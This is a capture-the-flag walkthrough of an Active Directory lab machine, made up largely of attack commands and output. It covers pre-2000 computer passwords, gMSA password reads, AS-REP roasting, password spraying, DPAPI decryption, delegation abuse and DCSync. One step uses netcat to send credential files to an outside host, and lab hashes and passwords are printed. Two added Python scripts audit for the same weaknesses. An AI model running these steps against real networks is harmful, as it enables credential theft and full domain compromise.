Basic information

As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

Port scan

No web ports, only the usual domain ports:

$ nmap -sC -sV -Pn 10.10.11.45
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-02 13:45 CST
Nmap scan report for 10.10.11.45
Host is up (0.074s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-02 05:32:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-12-02T05:32:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -13m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.39 seconds

bloodhound

Since initial credentials were provided, add the hosts entry and run BloodHound first:

10.10.11.45 vintage.htb dc01.vintage.htb

faketime -f "-13m" bloodhound-python -u P.Rosa -p Rosaisbest123 -d vintage.htb -c All --zip --dns-tcp -ns 10.10.11.45

BloodHound shows no direct path for now.

users.txt

The user list can be compiled from BloodHound, or like this:

faketime -f "-13m" nxc smb dc01.vintage.htb -u P.Rosa -p Rosaisbest123 -d vintage.htb -k --rid-brute 5000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
gMSA01$
FS01$
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm

pre2k

Here, the option "Assign this computer account as a pre-Windows 2000 computer" was ticked when the host was added, which causes the hostname to be used as the password automatically.

Using this approach, FS01 is found and a ccache is obtained:

faketime -f "-13m" pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile ../users.txt -verbose

[14:24:44] INFO VALID CREDENTIALS: vintage.htb\FS01$:fs01

FS01 to GMSA

Then operate with the fs01 ticket obtained above:

export KRB5CCNAME=FS01\$.ccache

According to BloodHound, fs01 is a member of Domain Computers and can read the gMSA password.

Reading the gMSA yields gmsa01$:

faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

54311f0ed05b807a7aaf5943b595f224

GMSA01

Next, request a ticket for gmsa01 for the following steps:

faketime -f "-13m" python3 examples/getTGT.py vintage.htb/'GMSA01$' -hashes :54311f0ed05b807a7aaf5943b595f224

export KRB5CCNAME=GMSA01\$.ccache

gmsa01 has GenericWrite over SERVICEMANAGERS.

So we can act on this group, for example by adding a user.

SERVICEMANAGERS in turn has GenericAll over several svc accounts, so we can modify their attributes. Among the users there is a disabled SVC_SQL, so we can re-enable that disabled account.

SERVICEMANAGERS

First add the user to the SERVICEMANAGERS group:

faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"

SVC_XXX

Then use the P.Rosa account we added to operate on the svc accounts:

faketime -f "-13m" python3 examples/getTGT.py vintage.htb/P.Rosa:Rosaisbest123
export KRB5CCNAME=P.Rosa.ccache

# set these accounts to not require preauth, for AS-REP roasting afterwards
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH

# enable SVC_SQL
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE
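The pre2k finding above and the userAccountControl edits just made (DONT_REQ_PREAUTH added, ACCOUNTDISABLE removed) both come down to bits in one attribute. The following audit script is an added example, not part of the writeup or of bloodyAD: it decodes the userAccountControl bitmask and reports the two settings this box abused, so a defender can find them before someone else does. The account records are constructed for the example; in a real audit they would come from an LDAP query for sAMAccountName and userAccountControl.

```python
"""Audit userAccountControl (UAC) flags for the conditions this box abuses.

Added example; not part of the original writeup or of bloodyAD.
Checks performed:
  * PASSWD_NOTREQD on a computer account. UAC 4128 (0x1000 | 0x0020) is
    the classic "pre-Windows 2000 computer" value: until the machine really
    joins, the password is the lowercase hostname.
  * DONT_REQ_PREAUTH, which makes an account AS-REP roastable.
"""

# userAccountControl bit values (documented in MS-ADTS / MS-SAMR).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "DONT_REQ_PREAUTH": 0x400000,
}

COMPUTER_BITS = UAC_FLAGS["WORKSTATION_TRUST_ACCOUNT"] | UAC_FLAGS["SERVER_TRUST_ACCOUNT"]


def decode_uac(value):
    """Return the names of all known flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def is_pre2k(value):
    """True for a computer account that does not require a password (pre-2000 style)."""
    return bool(value & COMPUTER_BITS) and bool(value & UAC_FLAGS["PASSWD_NOTREQD"])


def audit(records):
    """Return (sAMAccountName, issue) pairs for every weak setting found."""
    findings = []
    for rec in records:
        name, uac = rec["sAMAccountName"], rec["userAccountControl"]
        if is_pre2k(uac):
            findings.append((name, "pre-Windows 2000 computer account: "
                                   "password may still be the lowercase hostname"))
        if uac & UAC_FLAGS["DONT_REQ_PREAUTH"]:
            findings.append((name, "Kerberos pre-authentication disabled: AS-REP roastable"))
    return findings


# Constructed sample directory, modelled on the account names seen on this box.
SAMPLE_RECORDS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000 | 0x80000},   # DC: trusted for delegation
    {"sAMAccountName": "FS01$", "userAccountControl": 4128},               # 0x1000 | 0x0020
    {"sAMAccountName": "P.Rosa", "userAccountControl": 0x200 | 0x10000},   # normal, password never expires
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200 | 0x0002},   # normal, disabled
    {"sAMAccountName": "svc_ark", "userAccountControl": 0x200 | 0x400000}, # normal, no preauth
]

if __name__ == "__main__":
    for name, issue in audit(SAMPLE_RECORDS):
        print(f"{name}: {issue}")
```

Run against a full export, the script flags FS01$ (pre-2000 computer account) and svc_ark (no pre-authentication) from the sample; on a real domain every hit for the first check should either be joined promptly or deleted, and every hit for the second check should be reviewed for why pre-authentication is off.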

asrep roast

With pre-authentication disabled on these accounts, the next step is AS-REP roasting:

faketime -f "-13m" python3 examples/GetNPUsers.py -request -format hashcat -usersfile users.txt vintage.htb/

Crack the resulting hash to get svc_sql's password:

sudo hashcat -m 18200 hash.txt ~/Tools/dict/rockyou.txt

Zer0the0ne

C.Neri & user flag

Spraying the cracked password shows that C.Neri uses the same password:

faketime -f "-13m" ./kerbrute_darwin_amd64 --dc vintage.htb -d vintage.htb -v passwordspray users.txt Zer0the0ne

2024/12/02 15:04:56 > [+] VALID LOGIN: svc_sql@vintage.htb:Zer0the0ne
2024/12/02 15:04:56 > [+] VALID LOGIN: C.Neri@vintage.htb:Zer0the0ne

Then log in with the obtained credentials. Since only Kerberos authentication is supported, the config file needs to be adjusted:

# switched to Kali for this part; there were some issues on the Mac
sudo ntpdate -s 10.10.11.45

impacket-getTGT vintage.htb/C.Neri:Zer0the0ne
export KRB5CCNAME=C.Neri.ccache

sudo nano /etc/krb5.conf
evil-winrm -i dc01.vintage.htb -r vintage.htb

krb5.conf

[libdefaults]
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
    }

[domain_realm]
    vintage.htb = VINTAGE.HTB
    .vintage.htb = VINTAGE.HTB

C.Neri_ADM

Looking at the user list, C.Neri also has an adm account.

DPAPI

This simulates a real-world scenario: the same person uses a regular account day to day and switches to an admin account for privileged operations, but saved the credentials for convenience. Standard DPAPI.

The machine has AV, though, so download the relevant files and work on them locally:

*Evil-WinRM* PS C:\Users\C.Neri\appdata\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> Get-ChildItem -Force

cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b"

cmd /c ".\nc64.exe 10.10.14.18 4444 < C:\Users\C.Neri\appdata\roaming\microsoft\credentials\C4BB96844A5C9DD45D5B6A9859252BA6"

Then decrypt the DPAPI blobs locally:

python3 ~/Tools/impacket/impacket_main/examples/dpapi.py masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne

python3 ~/Tools/impacket/impacket_main/examples/dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

Username : vintage\c.neri_adm
Unknown : Uncr4ck4bl3P4ssW0rd0312

DELEGATEDADMINS

Then operate as c.neri_adm:

faketime -f "-13m" python3 examples/getTGT.py vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312
export KRB5CCNAME=c.neri_adm.ccache

This account has GenericWrite over the DELEGATEDADMINS group, so we can add users to it.

So if we add an svc user that has an SPN set, it can impersonate other users through delegation. L.BIANCHI_ADM also has DCSync rights, so it can serve as our target user.

add svc to DELEGATEDADMINS

# use the servicemanagers ticket from earlier
export KRB5CCNAME=P.Rosa.ccache
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k set object 'SVC_SQL' servicePrincipalName -v "cifs/x"

# use c.neri_adm
export KRB5CCNAME=c.neri_adm.ccache
faketime -f "-13m" bloodyAD --host dc01.vintage.htb -d VINTAGE.HTB --dc-ip 10.10.11.45 -k add groupMember "DELEGATEDADMINS" "SVC_SQL"

impersonate & dcsync

Then use svc_sql to impersonate L.BIANCHI_ADM:

# if sql_svc has been automatically disabled again, re-enable it
# do these steps quickly in succession
faketime -f "-13m" python3 examples/getTGT.py vintage.htb/svc_sql:Zer0the0ne
export KRB5CCNAME=svc_sql.ccache

faketime -f "-13m" python3 examples/getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'
export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache

# dcsync
faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -just-dc-user Administrator -k -no-pass

468c7497513f8243b59980f2240a10de

root flag

Administrator actually cannot log in, so use L.BIANCHI_ADM instead:

export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache
faketime -f "-13m" python3 examples/wmiexec.py L.BIANCHI_ADM@dc01.vintage.htb -k -no-pass

hashdump

faketime -f "-13m" python3 examples/secretsdump.py L.BIANCHI_ADM@dc01.vintage.htb -just-dc-ntlm -k -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:b0e2eccf559f2be2120e9bce41a51e2c:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7aaf5943b595f224:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
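The dump above shows the weakness that turned a cracked service-account password into a user foothold: C.Neri and svc_sql carry the same NT hash, as do G.Viola and svc_ark. The following script is an added example, not part of the writeup or of Impacket; it parses secretsdump-style user:rid:lmhash:nthash::: lines and reports accounts that share an NT hash (same password) or hold the empty-password hash, which is the check a domain owner would run over such a dump during an audit. SAMPLE_DUMP is constructed from a subset of the lines above plus a banner line to show that non-hash lines are skipped.

```python
"""Flag NT-hash reuse and empty passwords in secretsdump-style output.

Added example; not part of the original writeup or of Impacket.
Two accounts with the same NT hash share the same password, which is how
the svc_sql password also opened C.Neri on this box.
"""
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# user:rid:lmhash:nthash::: ; the user part may be prefixed with DOMAIN\
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


def parse_secretsdump(text):
    """Parse dump lines into dicts; banners and other non-matching lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        user = m.group("user").split("\\")[-1]  # drop an optional DOMAIN\ prefix
        entries.append({"user": user, "rid": int(m.group("rid")), "nt": m.group("nt").lower()})
    return entries


def find_reuse(entries):
    """Map NT hash -> accounts, for every hash shared by more than one account."""
    by_hash = defaultdict(list)
    for e in entries:
        if e["nt"] != EMPTY_NT:  # empty passwords are reported separately
            by_hash[e["nt"]].append(e["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def find_empty_passwords(entries):
    """Accounts whose NT hash is that of the empty string."""
    return [e["user"] for e in entries if e["nt"] == EMPTY_NT]


# Constructed sample: a subset of the dump from this box plus a banner line.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
"""

if __name__ == "__main__":
    parsed = parse_secretsdump(SAMPLE_DUMP)
    for nt_hash, users in find_reuse(parsed).items():
        print(f"shared password ({nt_hash[:8]}...): {', '.join(users)}")
    print("empty password:", ", ".join(find_empty_passwords(parsed)))
```

On the sample this reports two shared-password groups (C.Neri with svc_sql, G.Viola with svc_ark) and Guest as the only empty-password account. The hashes are only compared, never cracked, so the script can be run over a full export without handling plaintext passwords.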

References